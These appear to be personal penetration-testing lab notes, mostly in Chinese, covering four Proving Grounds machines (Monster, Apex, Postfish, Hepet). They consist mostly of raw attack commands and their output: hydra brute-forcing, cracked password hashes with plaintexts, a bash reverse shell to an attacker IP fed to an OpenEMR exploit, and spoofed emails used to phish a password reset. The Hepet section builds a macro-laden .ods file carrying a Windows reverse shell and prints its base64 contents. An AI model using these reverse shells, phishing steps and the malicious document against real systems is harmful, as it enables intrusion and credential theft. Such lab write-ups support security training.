[VERBOSE] Page redirected to http[s]://monster.pg:80/blog/admin/index.php?id=dashboard
[80][http-post-form] host: monster.pg login: admin password: wazowski
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-13 03:51:15Initial Access
登入後編輯 blog 的 theme ,改成 webshell 參考
Proof
┌──(kali㉿kali)-[~/oscp/pg/Monster]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.122.180] 53344
whoami
mike-pc\mike
PS C:\xampp\htdocs\blog> cd ~
PS C:\Users\Mike> type desktop\local.txt
a3dc38ffa696f013f7dcd65332a290bePrivilege Escalation
在用 SMB 傳輸檔案中,捕獲到 mike 的 ntlm hash 並破解得到 Mike14
┌──(kali㉿kali)-[~/oscp/pg/Monster]
└─$ cat hash
Mike::MIKE-PC:aaaaaaaaaaaaaaaa:8df70471d576d77b0fb23b9158c19fba:010100000000000080474cc03adcdb01d95d318659ffa1a300000000010010006a00590059006f004f004c0041006500030010006a00590059006f004f004c004100650002001000740067004d0069006b0045004c00760004001000740067004d0069006b0045004c0076000700080080474cc03adcdb01060004000200000008003000300000000000000000000000002000006b1697aa64514bb88a88537a904a2e212ffe02a1d991aae4f32695b6c1fb678f0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003200320038000000000000000000
┌──(kali㉿kali)-[~/oscp/pg/Monster]
└─$ hashcat -m 5600 hash --show
MIKE::MIKE-PC:aaaaaaaaaaaaaaaa:8df70471d576d77b0fb23b9158c19fba:010100000000000080474cc03adcdb01d95d318659ffa1a300000000010010006a00590059006f004f004c0041006500030010006a00590059006f004f004c004100650002001000740067004d0069006b0045004c00760004001000740067004d0069006b0045004c0076000700080080474cc03adcdb01060004000200000008003000300000000000000000000000002000006b1697aa64514bb88a88537a904a2e212ffe02a1d991aae4f32695b6c1fb678f0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003200320038000000000000000000:Mike14拿到後 RDP 登入,查看 readme_en.txt 確認 xampp 版本 7.3.10 有可以提權的 poc
Proof
┌──(kali㉿kali)-[~/oscp/pg/Monster]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.122.180] 57745
Windows PowerShell running as user Administrator on MIKE-PC
Copyright (C) Microsoft Corporation. All rights reserved.
whoami
mike-pc\administrator
PS C:\WINDOWS\system32> Apex
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.122.145 | TCP:80,445,3306 |
smb enumeration
smb 匿名登入可以訪問 /docs
web enumeration
在 /openemr 運行 openemr ,有 auth RCE 漏洞。在 /filemanager 運行 Responsive FileManager,有 Path Traversal 。
Initial Access
使用 exploit 利用 Path Traversal 去讀取 openemr 的 sql 帳密設定檔案,查詢後發現是 openemr/sites/default/sqlconf.php。但是因為 Responsive FileManager 沒辦法上傳 php ,更改 exploit ,data=”path=Documents”,再用 smb 去讀取
┌──(kali㉿kali)-[~/oscp/pg/Apex]
└─$ python3 49359 http://192.168.122.145 PHPSESSID=1imr2gc3hi502pe6v89elpq697 /var/www/openemr/sites/default/sqlconf.php
[*] Copy Clipboard
[*] Paste Clipboard┌──(kali㉿kali)-[~/oscp/pg/Apex]
└─$ smbclient //192.168.122.145/docs -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Jun 12 23:12:21 2025
.. D 0 Thu Jun 12 22:55:39 2025
passwd N 1607 Thu Jun 12 23:11:48 2025
sqlconf.php N 639 Thu Jun 12 23:12:21 2025
OpenEMR Success Stories.pdf A 290738 Fri Apr 9 11:47:12 2021
OpenEMR Features.pdf A 490355 Fri Apr 9 11:47:12 2021
16446332 blocks of size 1024. 10835424 blocks available
smb: \>
---
<?php
// OpenEMR
// MySQL Config
$host = 'localhost';
$port = '3306';
$login = 'openemr';
$pass = 'C78maEQUIEuQ';
$dbase = 'openemr';使用 mysql 帳密登入後拿到 username & password hash ,並破解 hash 得到 plaintext thedoctor
MariaDB [openemr]> select username,password from users_secure;
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2a$05$bJcIfCBjN5Fuh0K9qfoe0eRJqMdM49sWvuSGqv84VMMAkLgkK8XnC |
+----------+--------------------------------------------------------------+
1 row in set (0.069 sec)
MariaDB [openemr]>使用 exploit
┌──(kali㉿kali)-[~/oscp/pg/Apex]
└─$ python2 45161 http://192.168.122.145/openemr -u admin -p thedoctor -c 'bash -i >& /dev/tcp/192.168.45.228/80 0>&1'
.---. ,---. ,---. .-. .-.,---. ,---.
/ .-. ) | .-.\ | .-' | \| || .-' |\ /|| .-.\
| | |(_)| |-' )| `-. | | || `-. |(\ / || `-'/
| | | | | |--' | .-' | |\ || .-' (_)\/ || (
\ `-' / | | | `--.| | |)|| `--.| \ / || |\ \
)---' /( /( __.'/( (_)/( __.'| |\/| ||_| \)\
(_) (__) (__) (__) (__) '-' '-' (__)
={ P R O J E C T I N S E C U R I T Y }=
Twitter : @Insecurity
Site : insecurity.sh
[$] Authenticating with admin:thedoctor
[$] Injecting payloadProof
┌──(kali㉿kali)-[~/oscp/pg/Apex/OpenEMR-RCE]
└─$ rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.122.145] 59386
bash: cannot set terminal process group (1402): Inappropriate ioctl for device
bash: no job control in this shell
www-data@APEX:/var/www/openemr/interface/main$ cd ~
cd ~
www-data@APEX:/var/www$ ls
ls
html
openemr
www-data@APEX:/var/www$ cd /home
cd /home
www-data@APEX:/home$ ls
ls
white
www-data@APEX:/home$ cd white
cd white
www-data@APEX:/home/white$ ls
ls
local.txt
www-data@APEX:/home/white$ cat local.txt
cat local.txt
601e0819f26b5258cfa96d45425dc970Privilege Escalation
Proof
www-data@APEX:/$ su root
su root
Password: thedoctor
root@APEX:/# cat /root/proof.txt
cat /root/proof.txt
454dc757f3649c9acae3516c203e9d65
root@APEX:/# Postfish
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.162.137 | TCP:22,25,80,110,143,993,995 |
smtp enumeration
使用從網站收集下來的 list
┌──(kali㉿kali)-[~/oscp/pg/Postfish]
└─$ cewl http://postfish.off/ > list找到兩個用戶
┌──(kali㉿kali)-[~/oscp/pg/Postfish]
└─$ smtp-user-enum -M VRFY -U list -D postfish.off -t 192.168.162.137
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... list
Target count ............. 1
Username count ........... 117
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ postfish.off
######## Scan started at Thu Jun 12 08:03:02 2025 #########
192.168.162.137: Sales@postfish.off exists
192.168.162.137: Legal@postfish.off exists
######## Scan completed at Thu Jun 12 08:03:10 2025 #########
2 results.
117 queries in 8 seconds (14.6 queries / sec)使用 weak password sales/sales 讀去到 mail 內容
┌──(kali㉿kali)-[~/oscp/pg/Postfish]
└─$ curl "imap://postfish.off/INBOX;MAILINDEX=1" --user sales:sales
Return-Path: <it@postfish.off>
X-Original-To: sales@postfish.off
Delivered-To: sales@postfish.off
Received: by postfish.off (Postfix, from userid 997)
id B277B45445; Wed, 31 Mar 2021 13:14:34 +0000 (UTC)
Received: from x (localhost [127.0.0.1])
by postfish.off (Postfix) with SMTP id 7712145434
for <sales@postfish.off>; Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
Subject: ERP Registration Reminder
Message-Id: <20210331131139.7712145434@postfish.off>
Date: Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
From: it@postfish.off
Hi Sales team,
We will be sending out password reset links in the upcoming week so that we can get you registered on the ERP system.
Regards,
IT在網站 /team.html 可以看到 Sales team 的 member 是 Brian Moore,使用 usernamer.py 來生成可能的用戶名字,再將這些用 smtp 去驗證哪個真正的用戶名,得到用戶名是 Brian.Moore
┌──(kali㉿kali)-[~/oscp/pg/Postfish]
└─$ python2 ~/tools/usernamer.py -n "Brian Moore" > BrianMoore.test
┌──(kali㉿kali)-[~/oscp/pg/Postfish]
└─$ smtp-user-enum -M VRFY -U BrianMoore.test -D postfish.off -t 192.168.162.137
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... BrianMoore.test
Target count ............. 1
Username count ........... 93
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ postfish.off
######## Scan started at Thu Jun 12 08:31:35 2025 #########
192.168.162.137: @postfish.off exists
192.168.162.137: Brian.Moore@postfish.off exists
######## Scan completed at Thu Jun 12 08:31:40 2025 #########
2 results.
93 queries in 5 seconds (18.6 queries / sec)Initial Access
用 IT 的 mail 寄信給 Brain.Moore
┌──(kali㉿kali)-[~/oscp/pg/Postfish]
└─$ swaks -f it@postfish.off -t Brian.Moore@postfish.off -h "a" --body "http://192.168.45.228/"
=== Trying postfish.off:25...
=== Connected to postfish.off.
<- 220 postfish.off ESMTP Postfix (Ubuntu)
-> EHLO a
<- 250-postfish.off
<- 250-PIPELINING
<- 250-SIZE 10240000
<- 250-VRFY
<- 250-ETRN
<- 250-STARTTLS
<- 250-ENHANCEDSTATUSCODES
<- 250-8BITMIME
<- 250-DSN
<- 250-SMTPUTF8
<- 250 CHUNKING
-> MAIL FROM:<it@postfish.off>
<- 250 2.1.0 Ok
-> RCPT TO:<Brian.Moore@postfish.off>
<- 250 2.1.5 Ok
-> DATA
<- 354 End data with <CR><LF>.<CR><LF>
-> Date: Thu, 12 Jun 2025 08:44:35 -0400
-> To: Brian.Moore@postfish.off
-> From: it@postfish.off
-> Subject: test Thu, 12 Jun 2025 08:44:35 -0400
-> Message-Id: <20250612084435.1016118@kali>
-> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
->
-> http://192.168.45.228/
->
->
-> .
<- 250 2.0.0 Ok: queued as 85107458F8
-> QUIT
<- 221 2.0.0 Bye
=== Connection closed with remote host.收到重至的密碼 EternaLSunshinE
┌──(kali㉿kali)-[~/oscp/pg/Postfish]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.137] 34108
POST / HTTP/1.1
Host: 192.168.45.228
User-Agent: curl/7.68.0
Accept: */*
Content-Length: 207
Content-Type: application/x-www-form-urlencoded
first_name%3DBrian%26last_name%3DMoore%26email%3Dbrian.moore%postfish.off%26username%3Dbrian.moore%26password%3DEternaLSunshinE%26confifind /var/mail/ -type f ! -name sales -delete_password%3DEternaLSunshinE 用 SSH login
Proof
brian.moore@postfish:~$ cat local.txt
72e4ab3b54a1f2ab42dcfef18b63ee9f
brian.moore@postfish:~$ Privilege Escalation
sudo version 1.8.31 使用 exploit
Proof
brian.moore@postfish:~$ python3 exploit_nss.py
# id
uid=0(root) gid=0(root) groups=0(root),8(mail),997(filter),1000(brian.moore)
# cat /root/proof.txt
3cfa5aed38d464cf6b4c6ca82d6ef711
# ^CHepet
Service Enumeration
Port Scan Results
| Server IP Address | Ports Open |
| 192.168.162.140 | TCP:25,79,105,106,110,135,139,143,443,445,2224,5040,8000,11100,2001,33006 |
web enumeration
收集網頁上有的資訊文字,可能有帳號密碼
┌──(kali㉿kali)-[~/oscp/pg/Hepet]
└─$ cewl http://192.168.162.140:8000/ > list imap enumeration
透過 smtp-user-enum 找到五個用戶
┌──(kali㉿kali)-[~/oscp/pg/Hepet]
└─$ smtp-user-enum -M VRFY -U list -t 192.168.162.140
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... list
Target count ............. 1
Username count ........... 274
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Thu Jun 12 03:29:59 2025 #########
192.168.162.140: Charlotte exists
192.168.162.140: Magnus exists
192.168.162.140: Agnes exists
192.168.162.140: Jonas exists
192.168.162.140: Martha exists
######## Scan completed at Thu Jun 12 03:30:16 2025 #########
5 results.
274 queries in 17 seconds (16.1 queries / sec)分別把那 5 個 user 建成一個 list ,用 hydra 爆破
┌──(kali㉿kali)-[~/oscp/pg/Hepet]
└─$ hydra -L users -P list 192.168.162.140 imap
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-12 03:34:59
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1370 login tries (l:5/p:274), ~86 tries per task
[DATA] attacking imap://192.168.162.140:143/
[143][imap] host: 192.168.162.140 login: Jonas password: SicMundusCreatusEst
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-12 03:35:47
┌──(kali㉿kali)-[~/oscp/pg/Hepet]
└─$ cat users
Charlotte
Magnus
Agnes
Jonas
Martha其中的第二封信有提到 LibreOffice
┌──(kali㉿kali)-[~/oscp/pg/Hepet]
└─$ curl "imap://192.168.162.140/INBOX;MAILINDEX=2" --user jonas:SicMundusCreatusEst
Received: from spooler by localhost (Mercury/32 v4.62); 19 Oct 2020 12:28:41 -0700
X-Envelope-To: <jonas@localhost>
Return-path: <mailadmin@localhost>
Received: from kali (192.168.118.8) by localhost (Mercury/32 v4.62) with ESMTP ID MG000001;
19 Oct 2020 12:28:40 -0700
Message-ID: <359094.447081105-sendEmail@kali>
From: "mailadmin@localhost" <mailadmin@localhost>
To: "agnes@localhost" <agnes@localhost>
Cc: "jonas@localhost" <jonas@localhost>,
"magnus@localhost" <magnus@localhost>
Subject: Important
Date: Mon, 19 Oct 2020 19:28:39 +0000
X-Mailer: sendEmail-1.56
MIME-Version: 1.0
Content-Type: multipart/related; boundary="----MIME delimiter for sendEmail-808784.915440814"
X-PMFLAGS: 570949760 0 5 YGWVEUL6.CNM
This is a multi-part message in MIME format. To properly display this message you need a MIME-Version 1.0 compliant Email program.
------MIME delimiter for sendEmail-808784.915440814
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Team,
We will be changing our office suite to LibreOffice. For the moment, all the spreadsheets and documents will be first procesed in the mail server directly to check the compatibility.
I will forward all the documents after checking everything is working okay.
Sorry for the inconveniences.
------MIME delimiter for sendEmail-808784.915440814--Initial Access
生一個 ods file 塞入 macro ,再寄給 mailadmin
┌──(kali㉿kali)-[~/oscp/pg/Hepet]
└─$ python3 ~/tools/MMG-LO/mmg-ods.py windows 192.168.45.228 4444
[+] Payload: windows reverse shell
[+] Creating malicious .ods file
Done.┌──(kali㉿kali)-[~/oscp/pg/Hepet]
└─$ swaks -f jonas@localhost -t mailadmin@localhost -s 192.168.162.140 -h "a" --body "a" --attach @file.ods
=== Trying 192.168.162.140:25...
=== Connected to 192.168.162.140.
<- 220 localhost ESMTP server ready.
-> EHLO a
<- 250-localhost Hello a; ESMTPs are:
<- 250-TIME
<- 250-SIZE 0
<- 250 HELP
-> MAIL FROM:<jonas@localhost>
<- 250 Sender OK - send RCPTs.
-> RCPT TO:<mailadmin@localhost>
<- 250 Recipient OK - send RCPT or DATA.
-> DATA
<- 354 OK, send data, end with CRLF.CRLF
-> Date: Thu, 12 Jun 2025 05:14:20 -0400
-> To: mailadmin@localhost
-> From: jonas@localhost
-> Subject: test Thu, 12 Jun 2025 05:14:20 -0400
-> Message-Id: <20250612051420.910526@kali>
-> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
-> MIME-Version: 1.0
-> Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_910526"
->
-> ------=_MIME_BOUNDARY_000_910526
-> Content-Type: text/plain
->
-> a
-> ------=_MIME_BOUNDARY_000_910526
-> Content-Type: application/octet-stream; name="file.ods"
-> Content-Description: file.ods
-> Content-Disposition: attachment; filename="file.ods"
-> Content-Transfer-Encoding: BASE64
->
-> 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
